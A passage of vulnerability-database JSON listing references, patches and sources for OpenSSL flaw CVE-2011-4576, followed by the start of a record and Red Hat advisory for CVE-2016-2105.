"BID", "id": "51281", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2011-4576", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116824", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116124", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110012", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108700", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "113582", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109788", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109073", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "id": "VAR-201201-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-23T21:16:40.308000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2013-06-04-1", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "title": "HT5784", "trust": 0.8, "url": "http://support.apple.com/kb/ht5784" }, { "title": "HT5784", "trust": 0.8, "url": "http://support.apple.com/kb/ht5784?viewlocale=ja_jp" }, { "title": "DTLS Plaintext Recovery Attack", "trust": 0.8, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "title": "CVE-2011-4576 Information Disclosure vulnerability in OpenSSL", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2011_4576_information_disclosure" }, { "title": "Multiple vulnerabilities in OpenSSL", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl" }, { "title": "TLSA-2014-1", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2014/tlsa-2014-1j.html" }, { "title": "VMSA-2012-0013", "trust": 0.8, "url": "http://www.vmware.com/jp/support/support-resources/advisories/vmsa-2012-0013.html" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120086 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120060 - security advisory" }, { "title": "Red Hat: Important: rhev-hypervisor6 security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120109 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120059 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: CVE-2011-4354: OpenSSL 0.9.8g (32-bit builds) bug leaks ECC private keys", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ea25fd33228ddfe870d0eb9177265369" }, { "title": "Debian CVElist Bug Report Logs: Potential DTLS crasher bug", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=42b9da1ce27bbcacbdb9142890b6ad6b" }, { "title": "Debian Security Advisories: DSA-2390-1 openssl -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e583d2cd94d02b09eb008edba3c25e28" }, { "title": "Amazon Linux AMI: ALAS-2012-038", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-038" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "VMware Security Advisories: VMware vSphere and vCOps updates to third party libraries", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ebfa7ecfec1f973ff975279d7fce2976" } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 1.4, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:006" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:007" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00018.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00017.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/48528" }, { "trust": 1.1, "url": "http://www.debian.org/security/2012/dsa-2390" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=132750648501816\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=134039053214295\u0026w=2" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-november/092905.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/55069" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57353" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=133951357207000\u0026w=2" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4576" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu91284469/" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu92046435/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4576" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2011-4576.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2011-4619.html" }, { "trust": 0.4, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4109.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.3, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2333" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2333.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2110.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0884.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4108.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1165.html" }, { "trust": 0.2, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.2, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0029.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0029" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2012:0086" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1357-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=5.1.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4325" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4110" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4128" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3363" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5029" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2496" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2761" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5064" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4180" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1089" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2699" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4252" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4609" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4132" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4324" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2484" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.0.0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0168.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0207.html" }, { "trust": 0.1, "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_virtualization_for_servers/2.2/html/technical_notes/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0207" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "http://secunia.com/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "http://lists.grok.org.uk/full-disclosure-charter.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1473" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-e41b71e6cfbe471dbd029deaab" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1583" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3192" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0027" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4108" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4619" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4109" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0109.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-4577.html" }, { "trust": 0.1, "url": "http://docs.redhat.com/docs/en-us/red_hat_enterprise_virtualization/3.0/html/technical_notes/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3210" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2011-4576" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "date": "2012-09-25T00:15:05", "db": "PACKETSTORM", "id": "116824" }, { "date": "2012-09-01T00:00:25", "db": "PACKETSTORM", "id": "116124" }, { "date": "2012-09-25T00:15:41", "db": "PACKETSTORM", "id": "116826" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-02-21T15:34:06", "db": "PACKETSTORM", "id": "110012" }, { "date": "2012-01-16T02:59:37", "db": "PACKETSTORM", "id": "108700" }, { "date": "2012-06-12T22:49:22", "db": "PACKETSTORM", "id": "113582" }, { "date": "2012-01-17T01:20:23", "db": "PACKETSTORM", "id": "108735" }, { "date": "2012-02-15T22:44:29", "db": "PACKETSTORM", "id": "109788" }, { "date": "2012-01-25T16:35:29", "db": "PACKETSTORM", "id": "109073" }, { "date": "2012-01-06T01:55:00.877000", "db": "NVD", "id": "CVE-2011-4576" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2016-08-23T00:00:00", "db": "VULMON", "id": "CVE-2011-4576" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2014-06-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "date": "2016-08-23T02:04:39.383000", "db": "NVD", "id": "CVE-2011-4576" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 } }
var-201605-0075
Vulnerability from variot
Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data. OpenSSL is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer.. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2h OpenSSL versions 1.0.1 prior to 1.0.1t. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0996-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0996.html Issue date: 2016-05-10 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2105, CVE-2016-2106)
-
